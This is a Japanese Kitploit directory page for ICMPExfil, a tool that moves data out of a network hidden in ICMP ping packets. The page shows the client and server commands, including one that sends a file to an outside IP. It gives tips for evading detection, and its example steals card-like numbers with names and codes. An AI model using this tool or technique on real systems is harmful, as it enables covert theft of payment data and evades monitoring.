Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ICMPExfil — ICMPを使用したデータの窃取 | Kitploit
ツール/GitHubGitHub/martinoj2009/icmpexfil
データ流出ネットワークセキュリティペネトレーションテスト
GitHubmartinoj2009/icmpexfil

ICMPExfil

ICMPを使用したデータの窃取

リポジトリを見る
101238年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ICMP Exfil

ICMP Exfil は、有効なICMPパケットを介してデータを転送できるようにします。クライアントスクリプトを使用して流出させたいデータを渡し、転送先のデバイスでサーバーを実行します。監視している人やセキュリティシステムは、有効なICMPパケットを見るだけで、パケットの構造に悪意のあるものはありません。また、データはICMPパケット内に隠されているわけではないので、パケットを見ても何が流出したかはわかりません。

Screen Shot

著者

Martino Jones, martinojones.com.

ASCII

現時点では、サポートしているのはASCII文字のみです。ASCII文字で表現できるもの(例:英数字)であれば何でも流出させることができます。例えば、16桁のかっこいい数字を借りた場合、クライアントスクリプトを使って ./ping.py --ascii "4111111111111111" のように実行し、それらの数字をサーバーに渡します。

サーバーへの送信

サーバーの送信先を設定するには2つのオプションがあります。--ip を使用するか、スクリプト内の ipToPing というデフォルトIPを設定することができます。

Wait

もう少し辛抱強くなり、データを流出させていることに気づかれにくくしたい場合は、--wait を使用して最小時間 + データ転送にかかる時間を指定できます。これはまだ開発中です... そのため、この変換は自分で行う必要がありますが、追加するのにそれほど時間はかからないはずです... また、ほとんどの人やセキュリティシステムはまだこれを検出していないので、あまり重要ではありません。

Verbose

pingが通過するのを確認したい場合は、--show を使用できます。

サーバーの起動/停止

サーバーを起動するには、sudo python3 server.py を実行するだけです。他に何もする必要はありません。終了するには、Control+C を押します。現時点ではサーバーに改良が必要で、データの送信元に基づいて入力をマッピングする必要があります。現在は1つのクライアントがサーバーにpingを送信するテストしか行っておらず、これはもちろん調整が必要です。基盤はすでに整っていますので、あとはリセットをまとめるだけです。

例

かっこいい16桁の数字がたくさんあるデータベースを見つけました。将来の研究のために保存する必要があるので、file というファイルに保存します。 コマンド:./ping.py --ip 1.2.3.4 --asciiFile file ファイルの内容: 4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe エンコードされたデータ: ['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', '0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000', '0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101', '0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100', '0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111', '0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101', '0001010'] サーバー:

root@kitploit:~
Calculating offsets


4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2   0 1 / 1 5   4 5 6   M a r t i n o   J o n e s   |   4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2   0 3 / 1 6   2 3 6   M a r t i n o   J o e 

TODO

協力していただけるなら、まだ追加すべきことがいくつかあります:

  • バイナリファイルの送信:ファイルをバイナリとして読み込むだけで、エンコードは不要。
  • サーバーにオフセットを渡せるようにする:ウィンドウを大きくしたり小さくしたりする場合に便利。特に非常に悪い接続で有用。
  • 終了時にIPからデータへのマッピングを表示。
  • サーバーを静かに動作させるオプション。
  • データが到着したら表示するオプション:少し難しいが、リアルタイムのオフセット計算が必要。
  • 思いついたらさらに追加 ;-)
ツールをダウンロード